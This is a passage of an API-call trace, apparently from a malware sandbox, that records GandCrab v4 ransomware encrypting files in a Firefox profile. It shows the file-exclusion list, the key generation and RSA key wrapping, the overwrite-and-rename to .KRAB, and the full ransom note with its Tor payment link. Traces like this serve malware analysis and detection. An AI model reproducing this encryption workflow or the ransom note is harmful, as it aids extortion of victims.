(in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="blocklist.xml" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist.xml") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist.xml" [0077.803] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0077.803] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist.xml.KRAB") returned 98 [0077.803] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist.xml") returned 93 [0077.803] lstrlenW (lpString=".xml") returned 4 [0077.803] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0077.803] wsprintfW (in: param_1=0x3010000, param_2="%s " | out: param_1=".xml ") returned 5 [0077.804] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.804] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist.xml") returned 93 [0077.804] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist.xml") returned 93 [0077.804] lstrcmpiW (lpString1="blocklist.xml", lpString2="desktop.ini") returned -1 [0077.804] lstrcmpiW (lpString1="blocklist.xml", lpString2="autorun.inf") returned 1 [0077.804] lstrcmpiW (lpString1="blocklist.xml", lpString2="ntuser.dat") returned -1 [0077.804] lstrcmpiW (lpString1="blocklist.xml", lpString2="iconcache.db") returned -1 [0077.804] lstrcmpiW (lpString1="blocklist.xml", lpString2="bootsect.bak") returned -1 [0077.804] lstrcmpiW (lpString1="blocklist.xml", lpString2="boot.ini") returned -1 [0077.804] lstrcmpiW (lpString1="blocklist.xml", lpString2="ntuser.dat.log") returned -1 [0077.804] lstrcmpiW (lpString1="blocklist.xml", lpString2="thumbs.db") returned -1 [0077.804] lstrcmpiW (lpString1="blocklist.xml", lpString2="KRAB-DECRYPT.html") returned -1 [0077.804] lstrcmpiW (lpString1="blocklist.xml", lpString2="KRAB-DECRYPT.txt") returned -1 [0077.804] lstrcmpiW (lpString1="blocklist.xml", lpString2="CRAB-DECRYPT.txt") returned -1 [0077.804] lstrcmpiW (lpString1="blocklist.xml", lpString2="ntldr") returned -1 [0077.804] lstrcmpiW (lpString1="blocklist.xml", lpString2="NTDETECT.COM") returned -1 [0077.804] lstrcmpiW (lpString1="blocklist.xml", lpString2="Bootfont.bin") returned -1 [0077.805] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0077.806] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x1011018) returned 1 [0077.818] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0077.818] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0077.818] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0077.818] CryptGenRandom (in: hProv=0x1011018, dwLen=0x20, pbBuffer=0x338e54c | out: pbBuffer=0x338e54c) returned 1 [0077.819] CryptReleaseContext (hProv=0x1011018, dwFlags=0x0) returned 1 [0077.819] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.819] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x1010f90) returned 1 [0077.822] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0077.823] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0077.823] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0077.823] CryptGenRandom (in: hProv=0x1010f90, dwLen=0x8, pbBuffer=0x338e56c | out: pbBuffer=0x338e56c) returned 1 [0077.823] CryptReleaseContext (hProv=0x1010f90, dwFlags=0x0) returned 1 [0077.823] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.824] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x10114e0) returned 1 [0077.827] CryptImportKey (in: hProv=0x10114e0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x1023538) returned 1 [0077.827] CryptGetKeyParam (in: hKey=0x1023538, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0077.827] CryptEncrypt (in: hKey=0x1023538, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3010000*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x3010000*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0077.828] GetLastError () returned 0x0 [0077.828] CryptDestroyKey (hKey=0x1023538) returned 1 [0077.828] CryptReleaseContext (hProv=0x10114e0, dwFlags=0x0) returned 1 [0077.828] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x1010ac8) returned 1 [0077.831] CryptImportKey (in: hProv=0x1010ac8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x1023238) returned 1 [0077.831] CryptGetKeyParam (in: hKey=0x1023238, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0077.832] CryptEncrypt (in: hKey=0x1023238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3010100*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x3010100*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0077.832] GetLastError () returned 0x0 [0077.832] CryptDestroyKey (hKey=0x1023238) returned 1 [0077.832] CryptReleaseContext (hProv=0x1010ac8, dwFlags=0x0) returned 1 [0077.832] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\blocklist.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7ec [0077.833] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0077.833] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0077.834] ReadFile (in: hFile=0x7ec, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e57c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e57c*=0x3ef9f, lpOverlapped=0x0) returned 1 [0077.912] SetFilePointerEx (in: hFile=0x7ec, liDistanceToMove=0xfffc1061, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.912] WriteFile (in: hFile=0x7ec, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x3ef9f, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338e578*=0x3ef9f, lpOverlapped=0x0) returned 1 [0077.913] WriteFile (in: hFile=0x7ec, lpBuffer=0x3010000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3010000*, lpNumberOfBytesWritten=0x338e578*=0x208, lpOverlapped=0x0) returned 1 [0077.913] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.917] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.918] CloseHandle (hObject=0x7ec) returned 1 [0077.961] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.961] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\blocklist.xml"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist.xml.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\blocklist.xml.krab")) returned 1 [0077.962] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.962] FindNextFileW (in: hFindFile=0x10230f8, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0077.962] lstrcmpW (lpString1="bookmarkbackups", lpString2=".") returned 1 [0077.962] lstrcmpW (lpString1="bookmarkbackups", lpString2="..") returned 1 [0077.962] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="bookmarkbackups" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups" [0077.962] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\" [0077.962] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0077.963] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0077.963] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0077.963] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0077.963] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0077.963] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.963] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0077.963] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\\\KRAB-DECRYPT.txt") returned 113 [0077.963] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\bookmarkbackups\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7ec [0077.965] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0077.965] WriteFile (in: hFile=0x7ec, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e320, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e320*=0x1f6e, lpOverlapped=0x0) returned 1 [0077.966] CloseHandle (hObject=0x7ec) returned 1 [0077.967] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.967] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0077.967] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x19, wMilliseconds=0xac)) [0077.967] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0077.968] GetWindowsDirectoryW (in: lpBuffer=0x3010000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0077.968] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x3010200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x3010600, lpMaximumComponentLength=0x3010608, lpFileSystemFlags=0x3010604, lpFileSystemNameBuffer=0x3010400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x3010600*=0xd2ca4def, lpMaximumComponentLength=0x3010608*=0xff, lpFileSystemFlags=0x3010604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0077.968] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\d2ca4a08d2ca4dee3d.lock") returned 119 [0077.968] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\bookmarkbackups\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x7ec [0077.969] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.970] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.970] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\") returned 96 [0077.970] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\*" [0077.970] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\*", lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 0x1023678 [0077.970] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.970] FindNextFileW (in: hFindFile=0x1023678, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0077.970] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.970] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.970] FindNextFileW (in: hFindFile=0x1023678, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0077.970] lstrcmpW (lpString1="bookmarks-2017-05-24_14_kL0o5I+exwq3TXuLDkMF9w==.jsonlz4", lpString2=".") returned 1 [0077.971] lstrcmpW (lpString1="bookmarks-2017-05-24_14_kL0o5I+exwq3TXuLDkMF9w==.jsonlz4", lpString2="..") returned 1 [0077.971] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\", lpString2="bookmarks-2017-05-24_14_kL0o5I+exwq3TXuLDkMF9w==.jsonlz4" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\bookmarks-2017-05-24_14_kL0o5I+exwq3TXuLDkMF9w==.jsonlz4") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\bookmarks-2017-05-24_14_kL0o5I+exwq3TXuLDkMF9w==.jsonlz4" [0077.971] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0077.971] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\bookmarks-2017-05-24_14_kL0o5I+exwq3TXuLDkMF9w==.jsonlz4.KRAB") returned 157 [0077.971] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\bookmarks-2017-05-24_14_kL0o5I+exwq3TXuLDkMF9w==.jsonlz4") returned 152 [0077.971] lstrlenW (lpString=".jsonlz4") returned 8 [0077.971] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0077.971] wsprintfW (in: param_1=0x3010000, param_2="%s " | out: param_1=".jsonlz4 ") returned 9 [0077.971] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.972] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\bookmarks-2017-05-24_14_kL0o5I+exwq3TXuLDkMF9w==.jsonlz4") returned 152 [0077.972] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\bookmarks-2017-05-24_14_kL0o5I+exwq3TXuLDkMF9w==.jsonlz4") returned 152 [0077.972] lstrcmpiW (lpString1="bookmarks-2017-05-24_14_kL0o5I+exwq3TXuLDkMF9w==.jsonlz4", lpString2="desktop.ini") returned -1 [0077.972] lstrcmpiW (lpString1="bookmarks-2017-05-24_14_kL0o5I+exwq3TXuLDkMF9w==.jsonlz4", lpString2="autorun.inf") returned 1 [0077.972] lstrcmpiW (lpString1="bookmarks-2017-05-24_14_kL0o5I+exwq3TXuLDkMF9w==.jsonlz4", lpString2="ntuser.dat") returned -1 [0077.972] lstrcmpiW (lpString1="bookmarks-2017-05-24_14_kL0o5I+exwq3TXuLDkMF9w==.jsonlz4", lpString2="iconcache.db") returned -1 [0077.972] lstrcmpiW (lpString1="bookmarks-2017-05-24_14_kL0o5I+exwq3TXuLDkMF9w==.jsonlz4", lpString2="bootsect.bak") returned -1 [0077.972] lstrcmpiW (lpString1="bookmarks-2017-05-24_14_kL0o5I+exwq3TXuLDkMF9w==.jsonlz4", lpString2="boot.ini") returned -1 [0077.972] lstrcmpiW (lpString1="bookmarks-2017-05-24_14_kL0o5I+exwq3TXuLDkMF9w==.jsonlz4", lpString2="ntuser.dat.log") returned -1 [0077.972] lstrcmpiW (lpString1="bookmarks-2017-05-24_14_kL0o5I+exwq3TXuLDkMF9w==.jsonlz4", lpString2="thumbs.db") returned -1 [0077.972] lstrcmpiW (lpString1="bookmarks-2017-05-24_14_kL0o5I+exwq3TXuLDkMF9w==.jsonlz4", lpString2="KRAB-DECRYPT.html") returned -1 [0077.972] lstrcmpiW (lpString1="bookmarks-2017-05-24_14_kL0o5I+exwq3TXuLDkMF9w==.jsonlz4", lpString2="KRAB-DECRYPT.txt") returned -1 [0077.972] lstrcmpiW (lpString1="bookmarks-2017-05-24_14_kL0o5I+exwq3TXuLDkMF9w==.jsonlz4", lpString2="CRAB-DECRYPT.txt") returned -1 [0077.972] lstrcmpiW (lpString1="bookmarks-2017-05-24_14_kL0o5I+exwq3TXuLDkMF9w==.jsonlz4", lpString2="ntldr") returned -1 [0077.972] lstrcmpiW (lpString1="bookmarks-2017-05-24_14_kL0o5I+exwq3TXuLDkMF9w==.jsonlz4", lpString2="NTDETECT.COM") returned -1 [0077.972] lstrcmpiW (lpString1="bookmarks-2017-05-24_14_kL0o5I+exwq3TXuLDkMF9w==.jsonlz4", lpString2="Bootfont.bin") returned -1 [0077.972] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0077.973] CryptAcquireContextW (in: phProv=0x338e234, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e234*=0x10113d0) returned 1 [0077.976] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0077.976] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0077.977] GetProcAddress 